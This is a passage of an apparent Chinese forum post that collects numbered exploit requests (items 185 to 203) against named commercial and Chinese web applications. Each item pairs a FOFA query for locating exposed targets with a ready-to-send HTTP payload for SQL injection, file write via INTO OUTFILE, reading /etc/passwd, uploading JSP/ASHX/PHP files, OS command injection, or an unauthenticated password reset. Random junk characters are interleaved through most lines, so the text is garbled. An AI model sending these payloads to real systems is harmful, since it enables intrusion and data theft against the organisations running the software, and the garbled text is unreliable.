% K( U: O+ L" s& W' ~* d: u" B% \version < 7.0.5.1- U" M v8 ]* r: i
FOFA:app="REALOR-天翼应用虚拟化系统"/ s( H6 K& D# m7 H2 ?6 g/ J
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1( G1 A2 `6 S. C" t* `
Host: host
5 u& ]+ l3 ]7 e+ ~/ \* V* z. c+ f8 s% i- B P6 t( ?& P$ C- p
+ ]* n8 E. |) l186. F-logic DataCube3 SQL注入
$ u# | e& l2 i2 D0 ]2 XCVE-2024-31750
! ~. X4 a6 Q, u0 |. j6 b2 |# hF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
% u! l; X& e4 E. ?/ y5 o5 JFOFA:title=="DataCube3"
/ q7 |0 E+ y. z1 `- V$ dPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
* Z- T# w* \( L* S; t" `) S( R# AHost: your-ip
8 h4 {: g9 s- i) y. Y# V8 y$ eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.04 }3 e' @, {7 z# O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
+ f2 i! B/ m: U# F E0 PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' J% H, y5 F. [: p+ ~& zAccept-Encoding: gzip, deflate
9 c# ^. T5 I- M L1 }" RConnection: close% L: z1 S+ x, E6 h4 l" g
Content-Type: application/x-www-form-urlencoded# K3 i" z8 r9 j& G
- A! q) Z9 U( k- y' Z& Qreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
* T+ v: w B6 P u5 L8 r* l% z7 P+ o* F7 k X
- t# f f1 @& ?% {
187. Mura CMS processAsyncObject SQL注入. e/ B$ o1 ?) i$ b8 T( N
CVE-2024-326404 Z# D& L. u" r: k) x6 T4 y
FOFA:"Mura CMS"4 G2 I; |( D' W/ E( U
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1* a0 |9 }+ w( n# S7 N: m) ~% I$ E* d
Host: your-ip' c! }% m. Y5 R. d& j/ h; l
Content-Type: application/x-www-form-urlencoded
: G" m3 r& ^$ v7 ]6 @$ n& p
+ T7 E; q& x, B) `' G
. [0 r& M2 I0 g! hobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1' n$ B6 |: K) A; T" a
$ F! X1 e! O6 z9 L
% y% i0 A# f+ ^7 c: c& r188. 叁体-佳会视频会议 attachment 任意文件读取
5 {: N9 s F: C. g9 V% E/ rversion <= 3.9.7( s" P) T7 E- g% P
FOFA:body="/system/get_rtc_user_defined_info?site_id"
% ?% W. \ ]) }* H# F# e. W h9 oGET /attachment?file=/etc/passwd HTTP/1.1
z3 e- S; X" X, y' ~1 G% O c9 ^Host: your-ip, z1 w7 ]- C6 R- W& P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
6 I! j: L, H' i+ K% |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' L/ w0 ]% |7 \( m
Accept-Encoding: gzip, deflate/ ]0 D# r8 K6 t
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8* ~; [' b! }6 M6 \# f
Connection: close
! i) Y0 R4 c( Q T; L8 P1 a' n+ ~+ Q" O+ m1 J+ m; L8 J% M
- E5 j0 M: P4 z0 H ]5 z
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
: ]6 F+ W4 M$ X( m7 J5 hFOFA:app="LANWON-临床浏览系统"0 }& v! e5 P$ C. N* g' w! f) d
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.13 {6 J8 I- s: G# y( b0 D" Z
Host: your-ip
" t. A( H- B4 x2 D) Q F9 SUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
5 K4 j+ a v: z) D5 x4 v: JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 A) f4 ~& W/ R( fAccept-Encoding: gzip, deflate
+ d8 M7 r0 ~( h- ^+ }6 ^Accept-Language: zh-CN,zh;q=0.9# u2 H$ @* o6 E1 z- P; i* ?
Connection: close" S3 x m/ [4 n! s
, m! d, H0 K$ j# I+ E7 Q
% n" z: ]: b' u6 f; |7 z, t$ d
190. 短视频矩阵营销系统 poihuoqu 任意文件读取" J* U- t. o, @9 b3 x; r8 ?
FOFA:title=="短视频矩阵营销系统"% r! d$ c3 ^$ Y# ?( W
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
6 _/ e- c$ `$ L3 k% C/ T9 `) i) mHost: your-ip
- Q! a" t- V1 y7 I+ FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.368 E2 F& Y; p( j4 P# H6 f/ G3 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9: K2 c) D5 E' K" ?
Content-Type: application/x-www-form-urlencoded
5 \* j' E3 K/ z5 \* I$ W7 AAccept-Encoding: gzip, deflate
0 w: H1 a5 R! K" Z- Q" NAccept-Language: zh-CN,zh;q=0.9
; J: j6 `0 k$ m: L9 B
% ~9 |: U; \& l2 Bpoi=file:///etc/passwd: p. ]# Y6 b6 W I8 U6 d5 d/ i
. e M9 @( _+ q) f' o1 B/ b3 d; ?
" s3 [ l' L: T5 O8 _6 w1 I191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
}9 r9 f, o. a4 _0 H7 yFOFA:body="/CDGServer3/index.jsp"
$ H: s6 z7 [ s. `* ]POST /CDGServer3/js/../NavigationAjax HTTP/1.16 g6 {; d& e# e" e
Host: your-ip/ j3 @' _4 i6 m0 a+ f( Q' f3 B8 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 J" [* W: }2 e# ?
Content-Type: application/x-www-form-urlencoded
) M( m2 `! ~4 x& e% T( l; Y4 X3 F" a. e
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=3 P) l% b% a% j: o2 r1 j4 @8 N
( {: t& U* H( Z) P% S' I4 r$ P
: X4 E0 ?! c' W7 T# F7 O* }192. 富通天下外贸ERP UploadEmailAttr 任意文件上传) L4 l) p2 L C, \
FOFA:title="用户登录_富通天下外贸ERP"
2 I! a+ |- l1 ~4 Z6 LPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1$ s" H: p; ]; |0 Y7 Y
Host: your-ip
9 z8 [, T4 U6 b0 {7 \0 l" KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36: R& q8 z( P) X1 @0 q
Content-Type: application/x-www-form-urlencoded
0 q6 c- w, N5 p3 }2 j% {( N" j
( D* J3 J& n. c# {
/ q- z2 `" `7 t" m) U) @<% @ webhandler language="C#" class="AverageHandler" %>
" A5 M0 m" ]" a8 x1 A0 u7 Pusing System;
+ v/ `" d3 q' V5 E8 }9 nusing System.Web;1 e& ~+ J0 M# K
public class AverageHandler : IHttpHandler
3 ]$ S7 j; _; e) S- X* D{
3 R [0 _9 @* ]public bool IsReusable
* p1 }& L' a3 s1 q8 d. _' l{ get { return true; } }3 b m0 P; g7 u
public void ProcessRequest(HttpContext ctx)9 d& L, C/ U# L" R+ j
{
8 m4 a* P1 m4 ?4 ictx.Response.Write("test");
' A/ s% z) N+ W" n$ A& g}8 C- X! X1 k& p, _; w
}
. T; h( @, ~7 n4 \' c# E' ?! n4 L6 v2 W [* u. ]9 t* Q
" v) R$ R! \5 L1 d$ F193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行5 ?- }4 g% H& L0 Q: y; j# `* K
FOFA:body="山石云鉴主机安全管理系统"# K/ h7 i0 z9 R& w
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
2 b, \, {" E A4 L0 q9 XHost:" O4 N# w* M! \5 i- K
Cookie: PHPSESSID=2333333333333;
0 {8 r X0 |- w) o5 ~) `+ G: VContent-Type: application/x-www-form-urlencoded
; L' e" w+ p% J9 ^& eUser-Agent: Mozilla/5.00 c' a7 ?! J% Q6 p
! O! r0 \& f. y2 _9 D0 T9 A/ {3 |6 k4 s5 v$ \( S
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.16 K( N2 x- G: J, A( }7 h5 n5 X
Host:
9 ?7 q. a, \- H4 {; t6 X$ HUser-Agent: Mozilla/5.0
9 L: g4 H# d! q% M0 y0 Y8 g- b# w9 LAccept-Encoding: gzip, deflate" u* e) i) |, Q) u
Accept: */*
: e* J3 `& }; XConnection: close
- J$ z$ a, @) bCookie: PHPSESSID=2333333333333;
/ }: ~: G. R) s5 N3 i! G) a' E. CContent-Type: application/x-www-form-urlencoded S( u4 \$ T$ T5 d; j
Content-Length: 84
) p/ d) {4 X, k/ I
* W% z# N$ L) O) _1 S' I( Yparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
- B6 f" ]! E3 r' ?+ ^
, Y4 D' m7 d2 E" J8 e5 \: l2 o& g. z. u: f
GET /master/img/config HTTP/1.17 L) E N' U4 f- b2 k! T
Host:
. d2 j* l/ U6 p2 t, p$ V9 O. SUser-Agent: Mozilla/5.0 k( X* J! w0 Q- W! ~& I
: I7 Q/ \1 @, N4 T
6 j( H0 [1 R. B194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传' K5 Y m O) s" H
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
* J: u5 [% }2 X/ s1 t. v
# {' ~1 R" Q( P! j, LPOST /servlet/uploadAttachmentServlet HTTP/1.15 x6 D* O5 I- K: Z! ], h+ |/ p' |
Host: host! x+ U, m& b T# H7 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
0 U- ?# |2 p7 Q: ]0 G; {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- {! ~4 y( O& W0 G6 ~) xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ g8 R) R: c. k! [+ I7 JAccept-Encoding: gzip, deflate
2 B; p/ H* C! u; D/ M0 gConnection: close
. O. U) T- q( w Y ]Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk; S9 H/ }% j5 X6 G! T8 b4 ?
------WebKitFormBoundaryKNt0t4vBe8cX9rZk7 Z N! h8 ?' K! u( Y8 K7 K
) V% C( R3 P& c: z( ?Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
" V" z, s. n! S" g5 rContent-Type: text/plain
6 O* y4 Z4 ~: R8 V0 i<% out.println("hello");%>
& t/ S" l0 q" N2 |------WebKitFormBoundaryKNt0t4vBe8cX9rZk$ _$ ?8 J7 j3 P' e# |; P
Content-Disposition: form-data; name="json") n. H7 x. Q ^" \3 ?
{"iq":{"query":{"UpdateType":"mail"}}}4 H9 R0 r8 y) Q( V1 C2 y+ G |
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
, {; O5 ?! {$ Y: M+ E2 M* n; k, s1 ]" F( o/ ^+ {3 j
& w; N" P9 I7 u! \) ^8 y" o195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
" J0 b7 U. K0 M& U' p+ AFOFA:title=="飞鱼星企业级智能上网行为管理系统
+ L9 d/ d7 \! X! w( }0 UPOST /send_order.cgi?parameter=operation HTTP/1.1& E+ H+ R) Y/ D6 g+ ^" n
Host: 127.0.0.1 ?1 U% k9 q$ c: @$ J- f
Pragma: no-cache
/ C2 l+ `" j1 ]+ z$ H% _) j/ YCache-Control: no-cache2 A! v+ U4 T# w, l$ v! w2 z4 z$ v2 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
, E/ `8 y+ a4 h( w0 w, \ ~" X9 iAccept: */*: x8 D& }: Q+ Z+ O! E5 A
Accept-Encoding: gzip, deflate
$ S4 n9 C# S/ s* c5 I( q3 ?* rAccept-Language: zh-CN,zh;q=0.9
+ ?+ X3 E8 N) {0 nConnection: close1 a( |4 T& _& K& L" j# N
Content-Type: application/x-www-form-urlencoded
D! \5 n1 B! z0 O4 b4 CContent-Length: 68
3 t3 x2 }/ c' e0 V1 k, ~. m* h
) l0 ]1 U- k% R) S{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
' j# M5 Q7 {% F) ]0 K; M# `5 |! {( G- c Y
) D7 [0 t* u6 n7 C/ V: C" ?
196. 河南省风速科技统一认证平台密码重置1 N9 R1 E# W% Q0 M9 ^0 W% P% z0 L
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
% E8 V5 X9 R9 W7 P/ v& y7 GPOST /cas/userCtl/resetPasswordBySuper HTTP/1.18 r! L- Y/ g% {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36% c+ C3 D# ?/ E$ `
Content-Type: application/json;charset=UTF-8; F4 A, m( T2 Q( t
X-Requested-With: XMLHttpRequest% I: A* C! `! Y- g% _5 u2 _" F
Host:
* U" A6 J5 Y9 TAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Z4 P& \! Z8 h# y/ l5 K" OContent-Length: 45. D @$ M2 Q* G; A/ a
Connection: close
! A. D% ?8 V. G" n+ M; v% O# U5 ~% Z% l4 u" ?5 S
{"xgh":"test","newPass":"test666","email":""}5 S% T% b- m' R
. O: C+ f4 z( y, Q
) u. @( k/ k+ ]- G+ s
_% `0 F4 g$ C8 P' l197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
: m( j( T2 Z' s9 |% hFOFA:app="浙大恩特客户资源管理系统"
& }/ @6 _6 g- u7 u0 a; ?GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
5 p: S1 `5 w5 _Host:
+ h/ k, t5 f8 q( d2 L" L" |1 jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
, W# e! ?2 S5 y }Accept-Encoding: gzip, deflate% B4 Y4 P; y, M. Q4 n4 o, n8 V
Connection: close
* E% V6 \5 [7 Q7 c. d2 J/ @
& v7 [" E# h5 m: T; E- V& p
. T q: \, z. ]7 X8 N" m3 `; ?) K0 \ I* d! ~( c
198. 阿里云盘 WebDAV 命令注入
7 M3 K3 y" J0 l# k# i) x1 PCVE-2024-29640! ?. M3 X% o: e1 Y
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1% {! d. S0 Y1 r3 {* k7 D# V! T
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf647 h7 m9 ?& T8 H% i9 j8 O. H
Accept: */*
$ U$ @5 Q+ G4 O$ }Accept-Encoding: gzip, deflate. n' k9 E& q8 h6 t) q5 x6 J" B, h+ w
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
- ^. p9 \: q, _4 o' L. r R2 | YConnection: close! v* t( l/ f" ]+ d `6 @
1 i+ a% y0 c* ]. K8 A9 I' z" M0 c8 V* ~' C
199. cockpit系统assetsmanager_upload接口 文件上传0 @4 \( w2 l- {' a+ Q( W
8 H4 \9 Z6 R9 }( C2 P1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:$ B, H+ R' C2 A: l w! u/ X" o& g
GET /auth/login?to=/ HTTP/1.1
9 ~5 j, c" T' \+ }0 N4 y7 z. T5 @
; m2 F' i- o& ^响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
" p. T) z! e: A d, q
5 e4 X+ z, q( _: t' e: ^+ \3 o2.使用刚才上一步获取到的jwt获取cookie:9 R2 P+ p- Y6 c% n4 h% h
* _+ H/ m1 b* c7 d. cPOST /auth/check HTTP/1.1& y: v5 ~8 [# a
Content-Type: application/json8 N: {+ ^/ H" f7 _$ K# Y
' N& U/ {+ w! k1 o& u$ l; z h
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}- J- x: ]( e) U- P7 k8 r
+ C' r- W7 g7 l, D/ Y
响应:200,返回值:
" J) w* f& s$ f9 M% y- C/ fSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/5 c/ F s N S1 [2 ?
Fofa:title="Authenticate Please!"! Z8 @/ z2 p% e) C j* R4 g
POST /assetsmanager/upload HTTP/1.11 S# Y3 ?0 O% Z; ?# r* r2 c7 o
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb39 V$ b7 g& i% u% ] F. E6 ?
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92! L7 k. c: J- `' e; J
; V0 ^* W3 R; h( D/ S: N-----------------------------36D28FBc36bd6feE7Fb3
$ Y/ Z, b* f x2 {( gContent-Disposition: form-data; name="files[]"; filename="tttt.php"
9 Q9 i5 j- G6 r) T4 }, ~Content-Type: text/php
6 y+ \! r& S* N3 }
0 K: f$ A `3 J7 K+ h<?php echo "tttt";unlink(__FILE__);?>
9 y4 K, d/ [ v$ b. x-----------------------------36D28FBc36bd6feE7Fb3/ {2 D3 \% S2 @
Content-Disposition: form-data; name="folder"
3 G! @ N _/ b# i7 n- R" Z# A
4 q9 c- }, r& y" g& K/ Y. x-----------------------------36D28FBc36bd6feE7Fb3--
- E+ d6 B$ g" Z" t- Z1 k
& C. X5 U; e8 A9 ?! f7 L J! J9 p) A+ { P1 ~% E5 ~& P
/storage/uploads/tttt.php
3 a K0 l" ?$ N( w% [2 u. h" E5 p1 k# I* h0 h
200. SeaCMS海洋影视管理系统dmku SQL注入1 b, p& i! y+ h) _8 ]
FOFA:app="海洋CMS"
/ {. z2 v+ L- F/ iGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.12 B1 g) y) H' w7 _4 Z5 t, {2 q
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s( `) C. P1 N5 a! t: j& _+ }
Upgrade-Insecure-Requests: 1
$ s& Y6 I: F. b, c y0 }Cache-Control: max-age=03 \, L. @1 G/ N0 }! c4 W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: X. ]4 L6 Q: C* s2 S& N! n4 D
Accept-Encoding: gzip, deflate! p; X- k' `2 e" h7 }3 b
Accept-Language: zh-CN,zh;q=0.9. D) G5 U& O; Y) k0 ~! i5 v
0 }0 h, |* n7 p$ r5 u9 u5 V1 Y# U
1 n" q9 j- V! H( L! p0 h i7 X1 Q201. 方正全媒体新闻采编系统 binary SQL注入/ d, m& P+ @5 {+ I& h: d' V+ w
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"% I- Q7 q6 a2 Z
POST /newsedit/newsplan/task/binary.do HTTP/1.1
( f: z5 I4 L/ n8 @% |+ t" RContent-Type: application/x-www-form-urlencoded9 {1 w- u+ Z* b1 h# y( L) F. A! p0 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: j% H( T7 K/ C9 S- _Accept-Encoding: gzip, deflate# f4 ~ J) c2 }) O
Accept-Language: zh-CN,zh;q=0.9
) S- r! P' R3 \* M P; N! w" gConnection: close4 N# V5 R1 e1 G5 r
# n9 R: q+ L% v0 i+ h% |TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1; `6 r* h& ^) h$ h9 l
2 k! J U, Q [* {, l# z! \2 B
) Y k9 P7 F/ p) Y R202. 微擎系统 AccountEdit任意文件上传% c; D; r5 R* ?2 D; r) I- p/ e
FOFA:body="/Widgets/WidgetCollection/"
8 @0 Y* S+ ~: p) u( W1 p* I' F获取__VIEWSTATE和__EVENTVALIDATION值7 g, d& p8 B, ?# q; Z& f
GET /User/AccountEdit.aspx HTTP/1.1# Z$ r5 S0 I3 \/ p! U! Y6 T
Host: 滑板人之家
. }. C% Z7 g2 Y6 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
9 n6 E* f' A0 Y! R6 a; L$ cContent-Length: 08 Q1 ]6 N( `# o' o9 ^ L
# |9 A7 Q, h7 e* V
. h2 `7 m3 r; W% H. R0 M替换__VIEWSTATE和__EVENTVALIDATION值
: a. q- {$ B+ b s* pPOST /User/AccountEdit.aspx HTTP/1.1
( V; e, {8 G. k/ e0 Y. r/ kAccept-Encoding: gzip, deflate, br
9 n, j: _: d1 W1 S# z! tContent-Type: multipart/form-data;boundary=---------------------------786435874t385875938657365873465673587356870 B3 c6 H; P3 r4 _4 d) S
* M$ Z- `- H4 d+ q9 z. ?
-----------------------------786435874t38587593865736587346567358735687
( d, I% i/ p3 k: i/ P; Z# W1 y8 IContent-Disposition: form-data; name="__VIEWSTATE"
- E6 c# M+ u$ {8 ?! M: ~& d$ ~' N O* q3 [ Z+ U) _/ u
__VIEWSTATE
# L4 J* W h& t( o* a* x7 A-----------------------------786435874t38587593865736587346567358735687) \( {7 t3 B" i. J3 S
Content-Disposition: form-data; name="__EVENTVALIDATION"2 j: r4 w" G* n$ O
% O' ]5 S# d9 `; O R__EVENTVALIDATION
7 y+ Y" w# B p9 X$ J-----------------------------786435874t385875938657365873465673587356879 \# j, f- L: m" l1 ~- s
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
6 c% \' _8 D- [2 y: wContent-Type: text/plain; o7 J" {+ T4 d
: p1 b+ j+ G" X
Hello World!
! n9 }/ O5 z/ D9 A8 n/ |-----------------------------786435874t38587593865736587346567358735687
: s# O8 ]: B2 C' D, B" uContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
, N8 M5 Y8 O& O; R: N$ U
: z2 c, C5 f* |+ t' h1 G O' J) K! \上传图片
- ]3 n* `, O0 K8 `$ ` L2 T-----------------------------786435874t38587593865736587346567358735687
; ^/ Q2 A4 X8 G4 ~Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
" t+ Y0 r L* q2 o' c- b+ X6 v5 A4 A$ d4 m0 t" _9 R( M
; g4 X3 a0 l4 P- q8 Z
-----------------------------786435874t38587593865736587346567358735687
$ f) \' b1 ` D6 O* NContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"/ B& ^! J( z8 e9 o
* l& u* f6 O- [3 l
% F+ n' D. l7 Y. j& B' s-----------------------------786435874t38587593865736587346567358735687--3 a- F x% M* \+ T6 B5 o+ X- ?/ N+ g- m3 q
1 N2 |7 [. g. H* Y3 ?
( }8 ^& h6 n5 e" u9 x/_data/Uploads/1123.txt
& B+ f1 ]3 K! n: ]( r
) [: | Q, j2 d8 z' h# i0 V203. 红海云EHR PtFjk 文件上传3 |: {+ }+ s9 x( u/ \
FOFA:body="RedseaPlatform"
) l% [6 H# [, o+ p; YPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.18 W5 J2 {* I4 A9 V. L0 ~
Host: x.x.x.x
* b1 G4 Z+ f: B% g" g' W* VAccept-Encoding: gzip
1 O/ q! G+ s* |6 @+ i4 W0 zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) e4 }4 f& W3 _) L6 f! Y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4" {+ v, _$ s L. P# A$ z" a( S
Content-Length: 2101 B4 O! ^& U0 H; h. ?1 B
6 T0 w0 _8 h! O F& j
------WebKitFormBoundaryt7WbDl1tXogoZys4
5 k( p: A, Z6 ~ GContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
, w+ J p- p( i1 b/ _) y7 WContent-Type:image/jpeg
M5 y$ l: G: E) \' A0 m& I) ~5 Z
% l3 P! _" }, t$ m' T1 [* p$ D<% out.print("hello,eHR");%>6 E# j/ V) j$ t" }& E% ^3 m
------WebKitFormBoundaryt7WbDl1tXogoZys4--/ R: n9 M# K+ h Q( J5 l2 |
0 |1 r. @9 r- [7 x) C8 @
$ e3 t* b3 Q+ J( z
" A+ ? A% ~: l1 {
5 B# j/ Y8 a$ v/ T0 c' A2 h$ k2 I2 Q) X, V
) O: D* P3 {" v$ g; K$ ]: x |
发表于 2024-6-5 14:31:29
收藏
支持
反对